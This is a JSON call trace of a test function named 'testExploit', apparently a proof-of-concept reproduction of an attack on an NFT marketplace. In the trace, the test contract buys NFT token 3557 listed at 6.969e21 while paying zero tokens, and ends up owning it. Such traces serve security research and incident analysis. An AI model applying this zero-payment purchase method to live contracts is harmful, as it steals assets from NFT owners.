{
  "logs": {
    "calls": [
      {
        "id": "392119",
        "contract": "ContractTest",
        "function": "testExploit",
        "args": "",
        "return_value": "Returned",
        "depth": 0,
        "internal_calls": [
          {
            "id": "2668",
            "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
            "function": "ownerOf",
            "args": "3557",
            "return_value": "0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165",
            "depth": 1,
            "internal_calls": [],
            "value": null
          },
          {
            "id": "347059",
            "contract": "0x812cdA2181ed7c45a35a691E0C85E231D218E273",
            "function": "buyItem",
            "args": "0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0, 6969000000000000000000 [6.969e21]",
            "return_value": "Returned",
            "depth": 1,
            "internal_calls": [
              {
                "id": "7061",
                "contract": "0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee",
                "function": "listings",
                "args": "0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165",
                "return_value": "0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000179ca4da0a7d14400000000000000000000000000000000000000000000000000000000017ee748ff2c",
                "depth": 2,
                "internal_calls": []
              },
              {
                "id": "2350",
                "contract": "0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee",
                "function": "paymentToken",
                "args": "",
                "return_value": "0x000000000000000000000000539bde0d7dbd336b79148aa742883198bbf60342",
                "depth": 2,
                "internal_calls": []
              },
              {
                "id": "22271",
                "contract": "0x539bdE0d7Dbd336b79148AA742883198BBF60342",
                "function": "transferFrom",
                "args": "ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0",
                "return_value": "true",
                "depth": 2,
                "internal_calls": [
                  {
                    "id": "2337",
                    "contract": "0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333",
                    "function": "implementation",
                    "args": "",
                    "return_value": "0x3f770Ac673856F105b586bb393d122721265aD46",
                    "depth": 3,
                    "internal_calls": []
                  },
                  {
                    "id": "12128",
                    "contract": "0x3f770Ac673856F105b586bb393d122721265aD46",
                    "function": "transferFrom",
                    "args": "ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0",
                    "return_value": "true",
                    "depth": 3,
                    "internal_calls": []
                  }
                ]
              },
              {
                "id": "350",
                "contract": "0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee",
                "function": "paymentToken",
                "args": "",
                "return_value": "0x000000000000000000000000539bde0d7dbd336b79148aa742883198bbf60342",
                "depth": 2,
                "internal_calls": []
              },
              {
                "id": "5802",
                "contract": "0x539bdE0d7Dbd336b79148AA742883198BBF60342",
                "function": "approve",
                "args": "0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, 0",
                "return_value": "true",
                "depth": 2,
                "internal_calls": [
                  {
                    "id": "337",
                    "contract": "0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333",
                    "function": "implementation",
                    "args": "",
                    "return_value": "0x3f770Ac673856F105b586bb393d122721265aD46",
                    "depth": 3,
                    "internal_calls": []
                  },
                  {
                    "id": "4662",
                    "contract": "0x3f770Ac673856F105b586bb393d122721265aD46",
                    "function": "approve",
                    "args": "0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, 0",
                    "return_value": "true",
                    "depth": 3,
                    "internal_calls": []
                  }
                ]
              },
              {
                "id": "224098",
                "contract": "0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee",
                "function": "buyItem",
                "args": "0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0",
                "return_value": "Returned",
                "depth": 2,
                "internal_calls": [
                  {
                    "id": "632",
                    "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                    "function": "supportsInterface",
                    "args": "0x80ac58cd",
                    "return_value": "true",
                    "depth": 3,
                    "internal_calls": []
                  },
                  {
                    "id": "668",
                    "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                    "function": "ownerOf",
                    "args": "3557",
                    "return_value": "0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165",
                    "depth": 3,
                    "internal_calls": []
                  },
                  {
                    "id": "632",
                    "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                    "function": "supportsInterface",
                    "args": "0x80ac58cd",
                    "return_value": "true",
                    "depth": 3,
                    "internal_calls": []
                  },
                  {
                    "id": "127843",
                    "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                    "function": "safeTransferFrom",
                    "args": "0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0x812cdA2181ed7c45a35a691E0C85E231D218E273, 3557",
                    "return_value": "Returned",
                    "depth": 3,
                    "internal_calls": [
                      {
                        "id": "2538",
                        "contract": "0x602e50Ed10A90D324b35930EC0F8E5D3b28cD509",
                        "function": "isAtSchool",
                        "args": "3557",
                        "return_value": "0x0000000000000000000000000000000000000000000000000000000000000000",
                        "depth": 4,
                        "internal_calls": []
                      },
                      {
                        "id": "8113",
                        "contract": "0xCca920553ccc9aca80919e614325167d9Ec37b4A",
                        "function": "tokenOfOwnerByIndex",
                        "args": "0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0",
                        "return_value": "0x0000000000000000000000000000000000000000000000000000000000000000",
                        "depth": 4,
                        "internal_calls": [
                          {
                            "id": "2657",
                            "contract": "0xd666d1CC3102cd03e07794A61E5F4333B4239F53",
                            "function": "balanceOf",
                            "args": "0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165",
                            "return_value": "0",
                            "depth": 5,
                            "internal_calls": []
                          }
                        ]
                      },
                      {
                        "id": "31747",
                        "contract": "0xCca920553ccc9aca80919e614325167d9Ec37b4A",
                        "function": "upgradeSafe",
                        "args": "0",
                        "return_value": "0x0000000000000000000000000000000000000000000000000000000000000000",
                        "depth": 4,
                        "internal_calls": [
                          {
                            "id": "2338",
                            "contract": "0xd666d1CC3102cd03e07794A61E5F4333B4239F53",
                            "function": "totalSupply",
                            "args": "",
                            "return_value": "4294",
                            "depth": 5,
                            "internal_calls": []
                          },
                          {
                            "id": "27839",
                            "contract": "0xd666d1CC3102cd03e07794A61E5F4333B4239F53",
                            "function": "upgradeSafe",
                            "args": "0",
                            "return_value": "0x0000000000000000000000000000000000000000000000000000000000000000",
                            "depth": 5,
                            "internal_calls": [
                              {
                                "id": "2723",
                                "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                                "function": "balanceOf",
                                "args": "0x59D16389335147E034aA1238cA043Cba907f79Dd",
                                "return_value": "0",
                                "depth": 6,
                                "internal_calls": []
                              },
                              {
                                "id": "12303",
                                "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                                "function": "averageIQ",
                                "args": "",
                                "return_value": "0x00000000000000000000000000000000000000000000001dff8c484f43bf78eb",
                                "depth": 6,
                                "internal_calls": [
                                  {
                                    "id": "9101",
                                    "contract": "0x602e50Ed10A90D324b35930EC0F8E5D3b28cD509",
                                    "function": "totalIQ",
                                    "args": "",
                                    "return_value": "0x00000000000000000000000000000000000000000005712901ea29294f3ebab4",
                                    "depth": 7,
                                    "internal_calls": []
                                  }
                                ]
                              }
                            ]
                          }
                        ]
                      },
                      {
                        "id": "927",
                        "contract": "0x812cdA2181ed7c45a35a691E0C85E231D218E273",
                        "function": "onERC721Received",
                        "args": "0x2E3b85F85628301a0Bce300Dee3A6B04195A15Ee, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 3557, 0x",
                        "return_value": "0x150b7a02",
                        "depth": 4,
                        "internal_calls": []
                      }
                    ]
                  },
                  {
                    "id": "49236",
                    "contract": "0xb40BC8bF5f4dF00B0b32C56E8d3Ecd802656cCe4",
                    "function": "reportSale",
                    "args": "0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, 0x539bdE0d7Dbd336b79148AA742883198BBF60342, 6969000000000000000000 [6.969e21]",
                    "return_value": "Returned",
                    "depth": 3,
                    "internal_calls": []
                  },
                  {
                    "id": "9271",
                    "contract": "0x539bdE0d7Dbd336b79148AA742883198BBF60342",
                    "function": "transferFrom",
                    "args": "0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0xDb6Ab450178bAbCf0e467c1F3B436050d907E233, 0",
                    "return_value": "true",
                    "depth": 3,
                    "internal_calls": [
                      {
                        "id": "337",
                        "contract": "0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333",
                        "function": "implementation",
                        "args": "",
                        "return_value": "0x3f770Ac673856F105b586bb393d122721265aD46",
                        "depth": 4,
                        "internal_calls": []
                      },
                      {
                        "id": "8128",
                        "contract": "0x3f770Ac673856F105b586bb393d122721265aD46",
                        "function": "transferFrom",
                        "args": "0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0xDb6Ab450178bAbCf0e467c1F3B436050d907E233, 0",
                        "return_value": "true",
                        "depth": 4,
                        "internal_calls": []
                      }
                    ]
                  },
                  {
                    "id": "9271",
                    "contract": "0x539bdE0d7Dbd336b79148AA742883198BBF60342",
                    "function": "transferFrom",
                    "args": "0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0",
                    "return_value": "true",
                    "depth": 3,
                    "internal_calls": [
                      {
                        "id": "337",
                        "contract": "0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333",
                        "function": "implementation",
                        "args": "",
                        "return_value": "0x3f770Ac673856F105b586bb393d122721265aD46",
                        "depth": 4,
                        "internal_calls": []
                      },
                      {
                        "id": "8128",
                        "contract": "0x3f770Ac673856F105b586bb393d122721265aD46",
                        "function": "transferFrom",
                        "args": "0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0x52B24BecaE3fa1036cA0e956cd987D48A8f0e165, 0",
                        "return_value": "true",
                        "depth": 4,
                        "internal_calls": []
                      }
                    ]
                  }
                ]
              },
              {
                "id": "632",
                "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                "function": "supportsInterface",
                "args": "0x80ac58cd",
                "return_value": "true",
                "depth": 2,
                "internal_calls": []
              },
              {
                "id": "69979",
                "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                "function": "safeTransferFrom",
                "args": "0x812cdA2181ed7c45a35a691E0C85E231D218E273, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3557",
                "return_value": "Returned",
                "depth": 2,
                "internal_calls": [
                  {
                    "id": "538",
                    "contract": "0x602e50Ed10A90D324b35930EC0F8E5D3b28cD509",
                    "function": "isAtSchool",
                    "args": "3557",
                    "return_value": "0x0000000000000000000000000000000000000000000000000000000000000000",
                    "depth": 3,
                    "internal_calls": []
                  },
                  {
                    "id": "3613",
                    "contract": "0xCca920553ccc9aca80919e614325167d9Ec37b4A",
                    "function": "tokenOfOwnerByIndex",
                    "args": "0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0",
                    "return_value": "0x0000000000000000000000000000000000000000000000000000000000000000",
                    "depth": 3,
                    "internal_calls": [
                      {
                        "id": "2657",
                        "contract": "0xd666d1CC3102cd03e07794A61E5F4333B4239F53",
                        "function": "balanceOf",
                        "args": "0x812cdA2181ed7c45a35a691E0C85E231D218E273",
                        "return_value": "0",
                        "depth": 4,
                        "internal_calls": []
                      }
                    ]
                  },
                  {
                    "id": "7747",
                    "contract": "0xCca920553ccc9aca80919e614325167d9Ec37b4A",
                    "function": "upgradeSafe",
                    "args": "0",
                    "return_value": "0x0000000000000000000000000000000000000000000000000000000000000000",
                    "depth": 3,
                    "internal_calls": [
                      {
                        "id": "338",
                        "contract": "0xd666d1CC3102cd03e07794A61E5F4333B4239F53",
                        "function": "totalSupply",
                        "args": "",
                        "return_value": "4294",
                        "depth": 4,
                        "internal_calls": []
                      },
                      {
                        "id": "5839",
                        "contract": "0xd666d1CC3102cd03e07794A61E5F4333B4239F53",
                        "function": "upgradeSafe",
                        "args": "0",
                        "return_value": "0x0000000000000000000000000000000000000000000000000000000000000000",
                        "depth": 4,
                        "internal_calls": [
                          {
                            "id": "723",
                            "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                            "function": "balanceOf",
                            "args": "0x59D16389335147E034aA1238cA043Cba907f79Dd",
                            "return_value": "0",
                            "depth": 5,
                            "internal_calls": []
                          },
                          {
                            "id": "2303",
                            "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
                            "function": "averageIQ",
                            "args": "",
                            "return_value": "0x00000000000000000000000000000000000000000000001dff8c484f43bf78eb",
                            "depth": 5,
                            "internal_calls": [
                              {
                                "id": "1101",
                                "contract": "0x602e50Ed10A90D324b35930EC0F8E5D3b28cD509",
                                "function": "totalIQ",
                                "args": "",
                                "return_value": "0x00000000000000000000000000000000000000000005712901ea29294f3ebab4",
                                "depth": 6,
                                "internal_calls": []
                              }
                            ]
                          }
                        ]
                      }
                    ]
                  },
                  {
                    "id": "1803",
                    "contract": "ContractTest",
                    "function": "onERC721Received",
                    "args": "0x812cdA2181ed7c45a35a691E0C85E231D218E273, 0x812cdA2181ed7c45a35a691E0C85E231D218E273, 3557, 0x",
                    "return_value": "0x150b7a02",
                    "depth": 3,
                    "internal_calls": []
                  }
                ]
              }
            ],
            "value": null
          },
          {
            "id": "668",
            "contract": "0x6325439389E0797Ab35752B4F43a14C004f22A9c",
            "function": "ownerOf",
            "args": "3557",
            "return_value": "ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]",
            "depth": 1,
            "internal_calls": [],
            "value": null
          }
        ],
        "value": null
      }
    ]
  }
}